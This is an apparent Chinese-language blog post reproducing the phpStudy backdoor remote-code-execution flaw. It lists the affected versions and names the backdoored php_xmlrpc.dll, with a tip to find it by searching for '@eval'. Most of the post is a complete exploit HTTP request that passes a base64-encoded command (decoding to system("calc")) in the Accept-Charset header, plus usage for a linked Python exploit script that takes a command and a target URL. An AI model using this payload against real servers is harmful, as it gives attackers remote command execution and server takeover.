phpStudy后门RCE复现
0x00 影响版本
phpstudy 2016版PHP5.4存在后门。
phpstudy2018版php-5.2.17和php-5.4.45也同样存在后门
点击下载后门版
0x01 后门文件
后门文件路径:phpStudyPHPTutorialphpphp-5.4.45extphp_xmlrpc.dll
编辑器打开php_xmlrpc.dll文件搜索“@eval”字样判断有无后门
0x02 复现
EXP如下:
POST /index.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCJjYWxjIik7 此处填写的是要执行的命令base64加密
Accept-Encoding和Accept-Charset这两个必须要有
附上python验证脚本点击我下载
使用格式:python phpstudy.py whoami http://xxxx.com/